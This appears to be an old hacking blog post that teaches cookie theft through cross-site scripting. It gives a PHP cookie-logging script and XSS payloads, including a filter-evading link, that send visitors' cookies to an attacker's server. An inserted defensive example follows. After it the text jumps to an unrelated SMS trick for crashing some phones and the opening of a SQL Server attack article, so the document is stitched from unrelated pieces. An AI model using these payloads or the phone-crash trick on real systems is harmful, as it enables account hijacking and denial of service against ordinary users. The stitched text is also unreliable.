 
Posted in Snarfing with tags cookie snarf, how to steal cookies on August 12, 2008 by hacktocrack
Cookiestealing is one of the most fundamental aspects of XSS (cross site scripting).

Why is the cookie so important? Well, first you should see exactly what sort of information is stored in a cookie. Go to a website that requires a login, and after logging in erase everything in your address bar and type this line of code:

Code:
javascript:alert(document.cookie)

After you press enter, you should see a pop-up window with some information in it (that is, if this site uses cookies). This is the data that is stored in your cookie. Here's an example of what might be in your cookie:

Code:
username=CyberPhreak;password=ilikepie

This is, of course, a very insecure cookie. If any sort of vulnerability was found that allowed for someone to view other people's cookies, every user account is possibly compromised. You'll be hard-pressed to find a site with cookies like these. However, it is very common (unfortunately) to find sites with hashes of passwords within the cookie. The reason that this is unfortunate is because hashes can be cracked, and oftentimes just knowing the hash is enough.

Now you know why cookies are important; they usually have important information about the user in them. But how would we go about getting or changing other users' cookies? This is the process of cookiestealing.

Cookiestealing is a two-part process. You need to have a script to accept the cookie, and you need to have a way of sending the cookie to your script. Writing the script to accept the cookie is the easy part, whereas finding a way to send it to your script is the hard part. I'll show you an example of a PHP script that accepts cookies:

Code:
<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>
 
And there you have it, a simple cookiestealer. The way this script works is that it accepts the cookie when it is passed as a variable, in this case 'cookie' in the URL, and then saves it to a file called 'log.txt'. For example:

Code:
http://yoursite.com/steal.php?cookie=

steal.php is the filename of the script we just wrote, ? lets the script know that we are going to pass some variables to it, and after that we can set cookie equal to whatever we want, but what we want to do is set cookie equal to the cookie from the site. This is the second and harder part of the cookiestealer.

Most websites apply some sort of filter to input, so that you can't directly insert your own code. XSS deals with finding exploits within filters, allowing you to put your own code into a website. This might sound difficult, and in most cases it's not easy, but it can be very simple.

Any website that allows you to post text potentially allows you to insert your own code into the website. Some examples of these types of sites are forums, guestbooks, any site with a "member profile", etc. And any of these sites that have users who log in also probably use cookies. Now you know what sort of sites might be vulnerable to cookiestealing.

Let's assume that we have a website that someone made. This website has user login capability as well as a guestbook. And let's also assume that this website doesn't have any kind of filtering on what can be put into the guestbook. This means that you can put HTML and JavaScript directly into your post in the guestbook. I'll give you an example of some code that we could put into a guestbook post that would send the user's cookie to our script:

Code:
<script>document.location='http://yoursite.com/steal.php?cookie='+document.cookie;</script>

Now whenever someone views the page that you posted this on, they will be redirected to your script with their cookie from this site in the URL. If you were to look at log.txt now, you'd see the cookies of whoever looked at that page.

But cookiestealing is never that easy. Let's assume now that the administrator of this site got smart, and decided to filter out script tags. Now your code doesn't work, so we have to try and evade the filter. In this instance, it's easy enough:

Code:
<a href="javascript:void(document.location='http://yoursite.com/steal.php?cookie='+document.cookie)">Click Me</a>
 
In this case, when the user clicks on the link they will be sent to your stealer with their cookie. Cookiestealing, as are all XSS attacks, is mostly about figuring out how to get around filters.
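Seen from the guestbook owner's side, the script-tag filter described above fails because it removes one tag instead of encoding output. The following added example (not part of the original post) runs that filter and HTML output encoding over two constructed posts modelled on the ones above, and builds a session cookie that page script cannot read. All function names are hypothetical and `collector.example` is a placeholder host.

```javascript
// Added example, not from the original post. Runs under Node.js.
const crypto = require('crypto');

// The administrator's fix from the post: drop <script> tags and nothing else.
function stripScriptTags(input) {
  return input.replace(/<\/?script\b[^>]*>/gi, '');
}

// Output encoding for HTML text and quoted attribute values.
function escapeHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(input).replace(/[&<>"']/g, (ch) => map[ch]);
}

// True when the browser would still parse a tag out of the stored post.
function hasLiveTag(html) {
  return /<\/?[a-z]/i.test(html);
}

// Opaque random session id: nothing derived from the password is stored.
function newSessionToken() {
  return crypto.randomBytes(32).toString('hex');
}

// HttpOnly hides the cookie from document.cookie; Secure keeps it on HTTPS.
function sessionCookie(name, token) {
  return `${name}=${encodeURIComponent(token)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed guestbook posts mirroring the two shapes shown in the post.
const posts = [
  '<script>document.location="http://collector.example/c?cookie="+document.cookie;</script>',
  '<a href="javascript:void(document.location=\'http://collector.example/c?cookie=\'+document.cookie)">Click Me</a>',
];

// For each post: does live markup survive the tag filter? the encoder?
function compare() {
  return posts.map((p) => ({
    afterTagFilter: hasLiveTag(stripScriptTags(p)),
    afterEncoding: hasLiveTag(escapeHtml(p)),
  }));
}

console.log(compare());
console.log(sessionCookie('sid', newSessionToken()));
```

The link post passes through the tag filter untouched, while encoding turns both posts into inert text; the HttpOnly session id is what keeps `document.cookie` empty of anything worth taking if an injection is ever missed.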
Here is a new trick to restart your friend's mobile via SMS. With this trick only the 1110, 1110i, 1112, 1100 and 2100 can be restarted. Just type ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, or 79 inverted commas in a text message and send it to your friend who has one of the cells mentioned above and see what happens.
Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry out the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.

1. Direct connections via the Internet

These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield's Port Report shows just how many systems are sitting out there waiting to be attacked. I don't understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.
